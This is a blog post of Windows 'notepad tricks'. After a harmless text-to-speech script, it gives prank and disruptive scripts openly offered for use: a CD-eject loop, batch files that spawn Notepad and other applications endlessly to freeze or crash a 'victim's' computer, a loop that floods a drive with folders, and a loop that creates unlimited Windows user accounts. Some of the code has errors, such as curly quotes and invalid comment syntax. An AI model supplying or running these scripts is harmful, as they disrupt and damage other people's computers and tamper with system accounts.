Translate

Tuesday 19 August 2014


1)To make your pc talk


Open a New Notepad:

11

Type the command into the Notepad given below.....
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

12

Save the file with the help of Save As...

13

Save the file with a name "text to audio" along with(*.vbs) extension, it will create a Vb Script File.

15

Now save the file and go to desktop and then select the file and open it
It will prompt you for a text when u open the file, input the text and press OK."
u will hear now what u typed..
Enjoy..............

==================================================================================================

2)Popping CD Drives

This will make the CD drives constantly pop out
Open a text file in notepad and write:

11

Type the command into the Notepad given below.....

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

16

save it as .Vbs Extension
Enjoy.............
"Use at you own Risk Blog is not Responsible for any wrong or lawsuit"

==================================================================================================
3)Endless Notepads

This will pop up endless notepads until the computer freezes and crashes
Open a text file in notepad and write:

11

Type the command into the Notepad given below.....
**Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

16

Save it as application Bomber.vbs
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance.

"Use at you own Risk Blog is not Responsible for any wrong or lawsuit"

=================================================================================================
4) Folder flooder

Open a text file in notepad and write:

11

Type the command into the Notepad given below.....

@echo off
:x
md %random% // makes directory/folder.
goto x
 
16

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
Save it and ....................
Enjoy..................

"Use at you own Risk Blog is not Responsible for any wrong or lawsuit"

=================================================================================================
5) User account flooder
 
Open a text file in notepad and write:

11

Type the command into the Notepad given below.....

@echo off
:x
net user %random% /add //create user account
goto x

15

This code would start creating windows user accounts whose names could be any random numbers.
Save it and................
Enjoy....................

"Use at you own Risk Blog is not Responsible for any wrong or lawsuit"
__________________________________________________________________________________________________
==================================================================================================
__________________________________________________________________________________________________

No comments:

Post a Comment